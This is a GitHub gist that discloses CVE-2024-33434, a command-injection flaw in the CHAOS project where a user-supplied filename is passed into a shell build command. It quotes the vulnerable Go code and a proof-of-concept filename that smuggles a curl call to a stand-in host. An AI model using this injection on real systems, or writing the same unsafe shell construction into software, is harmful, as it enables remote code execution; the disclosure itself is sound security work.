Skip to content

Instantly share code, notes, and snippets.

@slimwang

slimwang/CVE-2024-33434.md

Last active May 7, 2024 00:34
Show Gist options
  • Save slimwang/d1ec6645ba9012a551ea436679244496 to your computer and use it in GitHub Desktop.
Save slimwang/d1ec6645ba9012a551ea436679244496 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2024-33434
Raw
CVE-2024-33434.md

CVE-2024-33434

  • affected product: https://github.com/tiagorlampert/CHAOS
  • affected version: commit before 1b451cf62582295b7225caf5a7b506f0bad56f6b & 24c9e109b5be34df7b2bce8368eae669c481ed5e
  • vulnerability type: RCE (Command Injection)

Details

In services/client_service.go, the author uses fmt.Sprintf() to build buildStr, then executes it with exec.Command() :

const buildStr = `GO_ENABLED=1 GOOS=%s GOARCH=amd64 go build -ldflags '%s -s -w -X main.Version=%s -X main.ServerPort=%s -X main.ServerAddress=%s -X main.Token=%s -extldflags "-static"' -o ../temp/%s main.go`
filename := handleFilename(input.OSTarget, input.Filename)
filename = handleFilename(input.OSTarget, filename)
buildCmd := fmt.Sprintf(buildStr, handleOSType(input.OSTarget), runHidden(input.RunHidden), c.appVersion, input.ServerPort, input.ServerAddress, token, filename)
cmd := exec.Command("sh", "-c", buildCmd)

While the filename variable is controlled by the attacker, someone can submit filename like this to inject a command in the buildStr, then it's executed:

filename := handleFilename(input.OSTarget, "1 main.go | curl yourdomain.com |cat")

Reference

tiagorlampert/CHAOS#95

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment